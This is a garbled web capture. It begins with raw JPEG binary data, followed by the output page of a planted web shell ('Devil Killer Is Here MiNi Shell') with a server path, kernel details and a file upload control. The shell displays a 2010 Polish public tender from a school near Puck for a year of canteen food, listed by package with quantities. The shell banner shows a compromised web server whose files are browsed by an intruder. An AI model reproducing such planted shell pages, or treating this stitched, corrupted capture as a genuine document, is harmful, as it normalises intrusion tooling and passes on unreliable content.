JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101129/340161-N-2010.html

<p class="kh_header"><b>Puck: Zakup i dostawy artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 340161 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu , Darzlubie, ul. Pucka 74, 84-100 Puck, woj. pomorskie, tel. 0-58 673 82 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.darzlubie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawy artykułów żywnościowych do stołówki szkolnej Zespołu Szkół im. Maksymiliana Wilandta w Darzlubiu.
Szczegółowy opis przedmiotu zamówienia zamieszczony jest w Formularzach Cenowych stanowiących Załączniki nr 2.1 - 2.10 do SIWZ.

Zamawiający dopuszcza składanie ofert częściowych w następujących pakietach: 

Pakiet nr 1 - Warzywa,
Pakiet nr 2 - Nabiał,
Pakiet nr 3 - Produkty suche,
Pakiet nr 4 - Mięso i wędliny,
Pakiet nr 5 - Drób,			
Pakiet nr 6 - Mrożonki,
Pakiet nr 7 - Pieczywo,
Pakiet nr 8 - Ciastka i ciasta,
Pakiet nr 9 - Ryby,
Pakiet nr 10 - Ziemniaki	.
Zamawiający dopuszcza składanie ofert częściowych na dowolną ilość pakietów. Zamawiający zastrzega jednak składanie ofert przez Wykonawcę na całość asortymentu w danym pakiecie.

Zamawiający zastrzega sobie prawo do niewykorzystania pełnego limitu ilościowego przedmiotu zamówienia. Z tego tytułu nie będą przysługiwały Wykonawcy żadne roszczenia o zapłatę za już dostarczony towar.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.50.00.00-3, 15.80.00.00-6, 15.13.14.10-2, 15.11.40.00-0, 15.41.21.00-0, 15.13.14.00-9, 15.11.11.00-0, 15.13.11.30-5, 15.11.21.30-6, 15.11.21.20-3, 15.13.11.35-0, 15.11.23.00-9, 15.33.11.70-9, 15.33.21.00-5, 15.81.00.00-9, 15.21.00.00-3, 15.23.50.00-4, 15.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku  z art. 144 Ustawy PZP ustala się następujące przesłanki i okoliczności jakie muszą być 
spełnione w przypadku zmiany postanowień zawartej umowy na wykonanie zadania: 
1)	nastąpią przekształcenia własnościowe,
2)	nastąpią zmiany techniczne lub organizacyjne,
3)	nastąpią zmiany adresu,
4)	zmianie ulega wielkość opakowań,
5)	nastąpi zakończenie, wstrzymanie lub wycofanie artykułów z produkcji,
6)	zmianie ulega harmonogram dostaw co do ilości i terminów,
7)	działanie siły wyższej (strajki generalne lub lokalne), mające bezpośredni wpływ na terminowość zamówień,
8)	wystąpienia innych okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo  zachowania należytej staranności,
Warunki dokonywania zmian: 
1)	inicjowanie zmian może nastąpić na wniosek wykonawcy i zamawiającego, 
2)	uzasadnienie zmian  -  prawidłowa realizacja umowy, obniżenie kosztów,
3)	zmiany umowy dokonuje się w  formie pisemnego aneksu do umowy pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.darzlubie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu, ul. Pucka 74, 84-100 Puck, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2010 godzina 09:45, miejsce: Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu
ul. Pucka 74
84-100 Puck
Sekretariat Szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2/1 : WARZYWA
Ilość zamówienia w dostawie rocznej:


1	MARCHEW	kg	150, 				
2	KALAFIOR	szt.	150 ,				
3	PIETRUSZKA NAĆ	p	380, 				
4	CEBULA BIAŁA 	kg	160 ,				
5	CZOSNEK	gł.	20 ,				
6	KOPER	p	130 , 			
7	SZCZYPIOR	p	160 ,				
8	POR	kg	90 ,	 			
9	BURACZKI	kg	600 ,				
10	BRUKSELKA	kg	100 ,				
11	BIAŁA RZODKIEW	kg	60, 				
12	RZODKIEWKA	p	50 ,				
13	PAPRYKA CZERWONA	kg	50 ,	 			
14	PAPRYKA ZÓŁTA	kg	20 				
15	PAPRYKA ZIELONA	kg	20 ,				
16	PAPRYKA  POMARANCZOWA	kg	20,			
17	KAPUSTA BIAŁA	kg	 500	,			
18	KAPUSTA CZERWONA	kg	120	,			
19	KAPUSTA WŁOSKA	kg	 110	,			
20	SAŁATA LODOWA	szt.	 180	,			
21	OGÓREK SWIEŻY 	kg	 300	,			
22	OGÓREK KISZONY	kg	 260	,			
23	OGÓREK MAŁOSOLNY	szt.	30,			
24	FASOLA JAŚ	kg	 130,				
25	FASOLA DROBNA	kg	 100,				
26	JABŁKA	kg	 300, 			
27	GRUSZKA	kg	 100,				
28	ŚLIWKA WEGIERKA	kg	 30,				
29	ANANAS PUSZKA MAŁA	szt.	10,				
30	BANAN	kg	 252,	
31	CYTRYNA 	kg	 20,			
32	ŚLIWA DUŻA	szt.	 340,				
33	NEKTARYNKA	szt.	 340,				
34	BRZOSKWUNIA	szt.	 340,				
35	POMARAŃCZA	kg	 171,				
36	MANDARYNKA	kg	 100,				
37	PIECZARKI	kg	 50,				
38	TRUSKAWKI	kg	 100,		
39	POMIDORY	kg	 70,				
40	WISNIE SWIEŻE	kg	 25,				
41	SELER	kg	 200,		
42	KAPUSTA PEKIŃSKA	kg	160,				
43	BOTWINKA	p	 60,	
44	FASOLKA SZPARAGOWA ZIELONA	kg	250,			
45	KAPUSTA KISZONA	kg	 250,	
46	KAPUSTA BIAŁA	szt.	 100,		
47	KAPUSTA CZERWONA 	szt.	100,				
48	KAPUSTA  PEKIŃSKA	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
zamówienia
w dostawie
rocznej:


1	JAJA	szt.	6500;
2	MARGARYNA 	szt.	150;
3	PALMA	szt.	 150;
4	MASŁO OSEŁKA GÓRSKA 500g	szt.	50;
5	MASŁO SMIETANKOWE 200g	szt.	30;
6	MASŁO WARLUBIE 200g	szt.	30;
7	MASŁO MIX PASŁEDZKI 200g	szt.	50;
8	MLEKO 3/2 % 
karton 1 litr	 l	350;
9	MAŚLANKA MRĄGOWSKA 
karton 1 litr	l	220;
10	MASLANKA TRUSKAWKOWA karton 1 litr 	l	 100;
11	ŚMIETANA 12% 
karton 0,5 litra	szt.	256;
12	ŚMIETANA 18%
karton 0,5 litra 	szt.	100;
13	ŚMIETANA 30%
karton 0,5 litra	szt.	 50;
14	ŚMIETANA RAMA 36%
karton 1 litr	szt.	100;
15	TWARÓG CHUDY	kg	 40;
16	TWARÓG MIELONY 
wiadro po 1 kg	kg	60;
17	OLEJ po 5 litrów	szt.	 30;
18	OLEJ po 3 litry	szt.	 21;
19	OLIWA Z OLIWEK
po 1 litrze	szt.	10;
20	JOGURTY NATURALNY po 900 g	szt.	 30;
21	JOGURTY MAŁE  RÓŻNE SMAKI 	szt.	680;
23	JOGURTY DANON	szt.	510;
24	BUDYŃ SERDUSZKO	szt.	 510;
25	SOS MAJONEZOWY
po 3 litry	szt.	35;
26	SER ŻÓŁTY EDEMSKI SALAMI	kg	10;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty suche.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie towaru
	Ilość,
jedn. miary,
gramatura:



1	CUKIER	100 kg;	 
2	CUKIER WANILIOWY	95 szt.;	
3	CYNAMON	30szt.;	 
4	CUKIER PUDER	20 kg	;
5	DROŻDŻE	20 szt.	po 100 g;
6	DŻEM WIADRO RÓZNE SMAKI	10 w	po 1 kg;
7	KISIEL	210 szt.;
8	MAKARON ŚWIDERKI	160 kg; 
9	MAKARON KOKARDKA	100 kg;	
10	MAKARON MUSZELKA	100 kg;	 
11	MAKARON KOLANKA	100 kg;	
12	M ĄKA PSZANNA	50 kg	po  1kg;
13	MĄKA TORTOWA	50 kg	po  1kg;
14	MAKA WROCŁAWSKA	50 kg	po  1kg;
15	MĄKA POZNAŃSKA	20 kg	po  1kg;
16	MĄKA ZIEMNIACZANA	35 kg	po  1kg;
17	OCET SPIRYTUSOWY	30 szt.	po  1litrze;
18	MAGII 	30 szt.	po  960 ml;
19	PRZYPRAWA WARZYWKO	30 szt.	po  1kg;
20	PRZYPRAWA KUCHAREK	20 szt.	po  1kg;
21	FIX DO SZPAGETTI PO BOL. W PROSZKU	40 szt.;	 
22	GROSZEK KON. PUSZKA	20 szt.	po  2,6kg;
23	GROCH ŁUSKANY	90 kg;	 
24	KWASEK CYTRYNOWY	5 kg;	
25	KONCENTRAT POM. W PUSZ.	25 szt.	po  4,550ml;
26	KONCENTRAT POM. W PUSZ.	15 szt.	po  878 g;
27	KASZA JĘCZMIENNA	30 kg	po  900 g;
28	KASZA PECZAK BIAŁA	400 kg;
29	KASZA GRYCZANA 	200 kg;	 
30	KONCENTRAT DO BARSZCZU	30 szt.;	
31	MUSZT.ARDA SAREPSKA	60 szt.	po  200 g;
32	KETCHUP ŁAGODNY WŁOCŁAWEK	76 szt.	po  1litrze;
33	KETCHUP PIKANTNY	76 szt.	po  1litrze;
34	KUKURYDZA PUSZKA 	25 szt.	po  2,600kg;
35	KUKURYDZA PUSZKA	60 szt.	mała;
36	CHRZAN W SŁOIKU	39 szt.	mały;
37	ZIARENKO SMAKU	20szt.	po  1kg;
38	PRZY. DO DROBIU DELIKAT	15 szt.	po  600 g;
39	PRZYP. DO MIES DELIKAT	15 szt.	po  700 g;
40	PRZYP. PAPRYKA SŁODKA	15 szt.	po  700 g;
41	PRZYP. DO SAŁATEK SOS OGRODOWY KAMIS	20 szt.;	 
42	PIEPRZ CZARNY MIELONY	10 szt.	po  0,800 g;
43	PIEPRZ BIAŁY	10 szt.	po  0,800 g;
44	LISCIE LAUROWE	25 szt.	po  100 g;
45	ZIELE ANGIELSKIE	25 szt.	po  100g;
46	SOS DO PIECZENI CIEMNY	10 szt.	po  1,2 kg;
47	SOS DO PIECZENI JASNY	10 szt.	po  1,2 kg;
48	SOS GRZYBOWY	10 szt.	po  1kg;
49	MAJERANEK	40 szt.	po  150 g;
50	PRZYP. OREGANO	30 szt.	po  10 g;
51	PRZYP. BAZYLIA	30 szt.	po  10 g;
52	ZIOŁA PROWANSALSKIE	40 szt.	po  10 g;
53	PROSZEK DO PIECZANIA	30 szt.	po  10 g;
54	RYŻ	170 kg	po  1 kg;
55	RODZYNKI	20 kg;
56	ŚLIWKA KALIFORNIJSKA	37 szt.	po  100 g;
57	SÓL	250 kg	po  1kg;
58	SYROPY POMARAŃCZOWY	50 szt.	po  5litrów;
59	SYROP TRUSKAWKA	50 szt.	po  5litrów;
60	SYROP WISNIA	50 szt.	po  5litrów;
61	SYROP RÓZNE SMAKI	50 szt.	po  5 litrów;
62	ŻUR W BUTELCE	124 l	po  1litrów;
63	KAKAO CIEMNE	5 szt.	po  250 g;
64	KURKUMA	20 szt.	po  10 g;
65	GALARETK  RÓŻNE SMAKI	100 szt.;	 
66	SOS SŁODKO KWAŚNY SŁOIK	260 szt.	po  460 g;
67	PRZYPRAWA DO KURCZAKA	60 szt.;	
68	KMINEK	20 szt.       	 po 15 g;
69	WEGETTA	20 szt.	po  1kg;
70	FASOLKA KONSER. CZER.	50 szt.;	 
71	SOS OGRODOWY KNORR	30 szt.;
72	PRZYPRAWA DO RYB	20 szt.;	 
73	CZOSNEK GRANULOWANY	30 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie towaru-Ilość zamówienia w dostawie rocznej:SCHAB B/K	kg	350;
ŁOPATKA B/K	kg	250;
BOCZEK ŚWIEŻY	kg	100;
BOCZEK WEDZONY	kg	50;
GOLONKA	kg	60;
ŻEBERKA	kg	150;
KOŚCI WIEPRZOWE	kg	50;
PACHWINA WEDZONA	kg	120;
MIELONE	kg	 700;
WOŁOWINA	kg	60;
MIESO GULASZOWE	kg	200;
KARKOWKA Z/ K	kg	100;
KARKÓWKA B/K	kg	100;
SMALEC	kg	 150;
SZYNKA KULKA	kg	260;
KIEŁBASA ZWYCZAJNA	kg	230;
KIEŁBASA BIAŁA	kg	100;
ŚLĄSKA 	kg	 200;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2, 15.11.40.00-0, 15.41.21.00-0, 15.13.14.00-9, 15.11.11.00-0, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie towaru-Ilość zamówienia w dostawie rocznej:FILET Z KURCZAKA	kg	500;
ĆWIARTKA Z KURCZAKA	kg	600; 
KORPUSY DROBIOWE	kg	50;
KURCZAK CAŁY	kg	100 ;
UDKO	kg	500 ;
SKRZYDEŁKO Z KURCZAKA	kg	100; 
MIELONE DROBIOWE	kg	150 ;
PIEROGI Z MIĘSEM VIRTU	kg	150 ;
PIEROGI Z KAPU I GRZ. VIRTU	kg	150 ;
KOPYTKA VIRTU	kg	150 ;
PIEROGI Z TRUS. VIRTU	kg	150; 
PIEROGI Z SEREM VIRTU	kg	100; 
BIODERKO KURCZAKA	kg	650;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.30-6, 15.11.21.20-3, 15.13.11.35-0, 15.11.23.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość zamówienia w dostawie rocznej:PIEROGI Z MIĘSEM	kg	150;
PIEROGI Z KAP I GRZYBAMI	kg	250;
PIEROGI Z SEREM	kg	100 ;
FASOLKA SZPARAGOWA	kg	250; 
MARCHEWKA KOSTKA	kg	250 ;
WŁOSZCZYZNA 	kg	150 ;
ZUPA 7 SKŁADNIKOWA	kg	100; 
FRYTKI	kg	700;
TRUSKAWKI MROZONE	kg	150;
KUKURYDZA	kg	100;
MAJONEZ  WIADRO- WINIARY po 3 kg	szt.	35; 
KALAFIOR MROŻONY	kg	100;
GROSZEK MROŻONY ZIELONY	kg	100; 
KNEDLE RÓZNE SMAKI	kg	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
zamówienia
w dostawie
rocznej:CHLEB ZWYKŁY KROJONY	szt.	500; 
BUŁKA KAJZERKA	szt.	1020;
BUŁKA MAŚLANA	szt.	340;
BUŁKA Z SEREM	szt.	180;
BUŁKA TARTA	kg	145;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ciastka i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
zamówienia
w dostawie
rocznej:DROŻDŻÓWKA	szt.	340;
DROŻDŻÓWKA Z SEREM	szt.	340;
DROŻDŻÓWKA Z MAKIEM	szt.	340;
DROŻDŻÓWKA Z BUDYNIEM	szt.	340;
PASZTECIK Z KAPUSTĄ I GRZYBAMI	szt.	510;
PĄCZEK	szt.	510;
CIASTKO FRANCUSKIE	szt.	180;
CIASTO  MURZYNEK	kg	50;
CIASTO MIODOWNIK	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
zamówienia
w dostawie
rocznej:FILET Z PANGI	kg	100;
FILET Z DORSZA	kg	170;
PŁATY ŚLEDZIOWE MARYNOWANE W ZALEWIE OCTOWEJ po 4 kg	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.21.00.00-3, 15.23.50.00-4.</p></li>
